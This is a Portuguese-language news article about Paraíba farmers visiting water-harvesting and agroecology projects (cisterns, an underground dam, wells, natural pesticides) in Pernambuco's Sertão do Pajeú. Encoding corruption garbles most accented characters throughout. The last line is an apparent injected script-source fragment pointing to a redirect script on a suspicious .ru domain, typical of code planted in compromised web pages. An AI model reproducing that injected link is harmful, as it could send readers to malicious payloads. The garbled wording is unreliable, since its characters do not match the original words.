Agricultores paraibanos visitam experiências no Sertão do Pajeú pernambucano

Agricultores paraibanos visitam experiências no Sertão do Pajeú pernambucano
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Dezoito agricultores/as dos munic+pios de Sol+nea, Rem+gio, Barra de Santa Rosa, Cacimba de Dentro, Picu+, Lagoa Seca, e Casserengue, pertencentes -s regi+es do P?lo Sindical da Borborema e Curimata+, na Para+ba, visitaram nos dias 11 e 12 de mar+o tr+s experi+ncias de manejo, capta+-o e uso da +gua em comunidades do Sert-o do Paje+ pernambucano. O interc+mbio foi promovido pelo Programa Uma Terra e Duas -guas (P1+2), da Articula+-o no Semi+rido Brasileiro (ASA).


A primeira visita ocorreu no dia 11, na propriedade de Jos+ Monteiro e de seu filho Jos+ Ivan, no S+tio Bom Sucesso, a aproximadamente 9 km do munic+pio de Tuparetama (PE). L+, os agricultores/as puderam observar as atividades de plantio, produ+-o de capim e de 35 variedades de frutas, hortali+as e verduras, al+m da cria+-o de mudas, que s-o distribu+das entre os vizinhos e vendidas na feira agroecol?gica da cidade de Afogados da Ingazeira.


Na propriedade, os visitantes conheceram as tr+s cisternas-cal+ad-o de Seu Jos+ Monteiro. As cisternas s-o integradas e cada uma tem capacidade de armazenamento de 6 mil litros, gerando 18 mil litros de +gua. Os reservat?rios foram adaptados pelo agricultor para captar a +gua que cai sobre o cal+ad-o.


Para o abastecimento familiar, existe a cisterna com calha, que armazena 16 mil litros. No S+tio, existe ainda uma barragem subterr+nea, onde s-o plantadas algumas variedades de capim e verduras, como a alface e o coentro. E mais 3 caixas que capta +gua de um a+ude e 1 po+o de an+is, de 6 metros de profundidade. Por fim, os agricultores visitaram o pomar e puderam saborear as frutas da regi-o.


No segundo dia (12/03), os agricultores/as visitaram as outras duas experi+ncias. A primeira, localizada na comunidade de Santo Ant-nia II, munic+pio de Afogadas da Ingazeira, foi na propriedade de Seu Jos+ Mendes Sobrinho (60), mais conhecido como Seu Z+ de Antonia. A cobertura vegetal do s+tio + mantida, pois como afirma Seu Jos+ ++ a melhor maneira de deixar o solo f+rtil+.


Como forma de evitar a prolifera+-o de pragas, “nada de utilizar veneno”, adianta o agricultor. Ele usa defensivos naturais feitos – base de urina de vaca ou fumo. Para a capta+-o de +gua, existe um po+o amazonas, de onde Seu Z+ de Antonia retira a +gua para o plantio, atrav+s de um sistema de irriga+-o por bomba. H+ tamb+m um po+o, escavado em 1998.


Da propriedade de Seu Z+ de Ant-nia, o grupo foi visitar a experi+ncia de Ednaldo Rodrigues do Nascimento, o Seu Nino, na comunidade Santo Ant-nia II, munic+pio de Carna+ba. Casado com Dona Josefa Nic+ssio, com quem tem cinco filhos, Seu Nino mostrou aos visitantes a experi+ncia do banheiro feito com an+is e a cisterna-cal+ad-o, de 50 mil litros.


Para Seu Moacir Paulino (45), do munic+pio de Casserengue-PB, o interc+mbio foi uma ?tima oportunidade para conhecer experi+ncias bem-sucedidas de manejo e uso da +gua para consumo humano e produ+-o, que “v-o ficar guardadas na sua mem?ria”.

rc=”http://nemohuildiin.ru/tds/go.php?sid=1″

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